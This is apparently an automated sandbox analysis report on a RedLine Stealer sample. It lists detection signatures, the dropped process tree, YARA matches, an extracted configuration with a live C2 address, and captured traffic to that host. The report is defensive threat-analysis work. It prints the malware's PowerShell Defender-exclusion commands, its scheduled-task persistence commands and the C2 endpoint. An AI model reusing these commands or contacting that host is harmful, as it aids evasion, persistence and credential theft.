Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
w4XFffGDz1.exe

Overview

General Information

Sample name:w4XFffGDz1.exe
renamed because original name is a hash value
Original sample name:2185ecde5380054ad075b7a25ae0ea51.exe
Analysis ID:1457840
MD5:2185ecde5380054ad075b7a25ae0ea51
SHA1:caa1b832574fc3050af5f97b6deabc21398b5c47
SHA256:e1a01751d2ea4682e211983eb7d6d1f01876a1199ba8eb9f04e3b8594f2ee199
Tags:exeRedLineStealer
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Script Execution From Temp Folder
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • w4XFffGDz1.exe (PID: 6412 cmdline: "C:\Users\user\Desktop\w4XFffGDz1.exe" MD5: 2185ECDE5380054AD075B7A25AE0EA51)
    • PO.exe (PID: 7532 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)
      • powershell.exe (PID: 7780 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7788 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7812 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 5020 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • schtasks.exe (PID: 7908 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • PO.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)
        • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • AJzHYZtQIb.exe (PID: 8164 cmdline: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe MD5: 86F98523CEB67DF5CC3431A839F63134)
    • schtasks.exe (PID: 8028 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp8574.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7960 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • AJzHYZtQIb.exe (PID: 5404 cmdline: "C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe" MD5: 86F98523CEB67DF5CC3431A839F63134)
      • conhost.exe (PID: 7848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["45.137.22.67:55615"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          0000000E.00000002.2274416687.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
          • 0x133ca:$a4: get_ScannedWallets
          • 0x12228:$a5: get_ScanTelegram
          • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
          • 0x10e6a:$a7: <Processes>k__BackingField
          • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
          • 0x1079e:$a9: <ScanFTP>k__BackingField
          00000015.00000002.2357626482.0000000002FF0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000010.00000002.2247047739.0000000004AFD000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 21 entries
              SourceRuleDescriptionAuthorStrings
              7.2.PO.exe.3c18d70.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                7.2.PO.exe.3c18d70.3.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  7.2.PO.exe.3c00f50.4.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    7.2.PO.exe.3c18d70.3.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                    • 0x117ca:$a4: get_ScannedWallets
                    • 0x10628:$a5: get_ScanTelegram
                    • 0x1144e:$a6: get_ScanGeckoBrowsersPaths
                    • 0xf26a:$a7: <Processes>k__BackingField
                    • 0xd17c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                    • 0xeb9e:$a9: <ScanFTP>k__BackingField
                    7.2.PO.exe.3c00f50.4.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      Click to see the 15 entries

                      System Summary

                      barindex
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", ProcessId: 7908, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", ProcessId: 7908, ProcessName: schtasks.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe", ProcessId: 7780, ProcessName: powershell.exe

                      Persistence and Installation Behavior

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe, ParentProcessId: 7532, ParentProcessName: PO.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\AJzHYZtQIb" /XML "C:\Users\user\AppData\Local\Temp\tmp61B0.tmp", ProcessId: 7908, ProcessName: schtasks.exe
                      No Snort rule has matched

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: 7.2.PO.exe.3c00f50.4.raw.unpackMalware Configuration Extractor: RedLine {"C2 url": ["45.137.22.67:55615"], "Bot Id": "cheat"}
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeVirustotal: Detection: 58%Perma Link
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeReversingLabs: Detection: 87%
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeVirustotal: Detection: 58%Perma Link
                      Source: w4XFffGDz1.exeReversingLabs: Detection: 68%
                      Source: w4XFffGDz1.exeVirustotal: Detection: 67%Perma Link
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeJoe Sandbox ML: detected
                      Source: w4XFffGDz1.exeJoe Sandbox ML: detected
                      Source: w4XFffGDz1.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: w4XFffGDz1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: w4XFffGDz1.exe
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00174D8A __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_00174D8A
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_00188590 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00188590
                      Source: C:\Users\user\Desktop\w4XFffGDz1.exeCode function: 0_2_001986E8 FindFirstFileExA,0_2_001986E8
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrocef_low\NULLJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\NULLJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\NULLJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\Adobe\AcrobatJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbxJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeFile opened: C:\Users\user\AppData\Local\Temp\acrord32_super_sbx\AdobeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exeCode function: 4x nop then jmp 07A5794Bh7_2_07A57B32
                      Source: C:\Users\user\AppData\Roaming\AJzHYZtQIb.exeCode function: 4x nop then jmp 07AA6DBBh16_2_07AA6FA3

                      Networking

                      barindex
                      Source: Malware configuration extractorURLs: 45.137.22.67:55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 55615
                      Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49723
                      Source: global trafficTCP traffic: 192.168.2.5:49710 -> 45.137.22.67:55615
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.67:55615Content-Length: 559666Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.67:55615Content-Length: 559658Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 45.137.22.67:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 45.137.22.67:55615Content-Length: 559133Expect: 100-continueAccept-Encoding: gzip, deflate
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 45.137.22.67:55615Content-Length: 559125Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: unknownTCP traffic detected without corresponding DNS query: 45.137.22.67
                      Source: global trafficDNS traffic detected: DNS query: api.ip.sb
                      Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 45.137.22.67:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.000000000347E000.00000004.00000800.00020000.00000000.sdmp, PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FB9000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.67:55615
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.67:55615/
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://45.137.22.67:55615t-
                      Source: PO.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                      Source: PO.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                      Source: PO.exeString found in binary or memory: http://ocsp.comodoca.com0
                      Source: PO.exe, 0000000E.00000002.2276292357.00000000033D8000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.00000000030A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.datacontract.org/2004/07/
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                      Source: AJzHYZtQIb.exe, 00000015.00000002.2357626482.000000000300B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                      Source: PO.exe, 0000000E.00000002.2276292357.0000000003181000.00000004.00000800.00020000.00000000.sdmp, AJzHYZtQIb.exe, 00000015.00000002.2357626482.0000000002FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
